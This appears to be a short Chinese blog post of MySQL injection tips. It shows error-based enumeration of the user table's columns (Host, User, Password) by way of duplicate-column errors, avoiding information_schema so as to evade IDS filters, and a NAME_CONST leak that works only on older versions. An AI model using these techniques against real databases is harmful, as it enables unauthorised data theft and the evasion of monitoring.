MySQL注入中新Tips

一,绕过IDS过滤information_schema继续注入 (来源:pentest.cc)
//利用MySQL出错爆出字段
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name 'Password'
.....
//得到信息
//可能是版本问题,我测试没能成功
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
好像是NAME_CONST的参数必须为CONST还是怎么了,悲剧。
下次再好好测试一下。

Update: (来源:toby57)
确实是版本的问题(高版本要求参数全为const,否则报错),这方法的通用性看来不是很好。
mysql> SELECT version();
+---------------------+
| version() |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT user()),0);
+----------------+
| root@localhost |
+----------------+
| 0 |
+----------------+
1 row in set (0.00 sec)

-------------------------------------
mysql> SELECT version();
+------------------+
| version() |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

你可能感兴趣的:(mysql)